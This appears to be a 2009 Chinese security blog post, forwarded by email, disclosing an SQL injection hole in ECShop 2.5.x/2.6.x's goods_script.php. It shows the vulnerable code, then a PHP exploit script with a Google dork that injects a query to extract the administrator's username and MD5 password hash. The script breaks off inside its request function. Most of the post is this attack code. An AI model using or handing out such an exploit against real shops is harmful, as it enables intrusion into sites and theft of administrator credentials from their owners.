2009年3月24日星期二

ECShop注射漏洞-鬼仔's Blog


来自"鬼仔's Blog"的最新文章,如果您不希望再收到此邮件,请退订;如果您需要更换其它邮箱接收邮件,请点击这里

Fuck The World!

ECShop注射漏洞

Tue, 24 Mar 2009 13:36:48 +0800

作者:Ryat
2009-03-24

影响2.5.x和2.6.x,其他版本未测试

goods_script.php44行:

    if (empty($_GET['type']))     {         ...     }     elseif ($_GET['type'] == 'collection')     {         ...     }     $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);     $res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)

EXP:

#!/usr/bin/php <?php  print_r(' +---------------------------------------------------------------------------+ ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit by puret_t mail: puretot at gmail dot com team: http://bbs.wolvez.org dork: "Powered by ECShop" +---------------------------------------------------------------------------+ '); /**  * works with register_globals = On  */ if ($argc < 3) {     print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host:      target server (ip/hostname) path:      path to ecshop Example: php '.$argv[0].' localhost /ecshop/ +---------------------------------------------------------------------------+ ');     exit; }  error_reporting(7); ini_set('max_execution_time', 0);  $host = $argv[1]; $path = $argv[2];  $resp = send(); preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);  if ($hash)     exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n"); else     exit("Exploit Failed!\n");  function send() {     global $host, $path;      $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';      $data = "POST ".$path."goods_script.php?type=".time()."  HTTP/1.1\r\n";     $data .= "Accept: */*\r\n";     $data .= "Accept-Language: zh-cn\r\n";     $data .= "Content-Type: application/x-www-form-urlencoded\r\n";     $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";     $data .= "Host: $host\r\n";     $data .= "Content-Length: ".strlen($cmd)."\r\n";     $data .= "Connection: Close\r\n\r\n";     $data .= $cmd; 

发表评论 | 分类:技术文章

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址:http://huaidan.org/archives/2946.html

相关日志


返回顶部

您可以直接回复此邮件与作者联系,该服务由Feedsky提供技术支持,祝您使用愉快

没有评论:

发表评论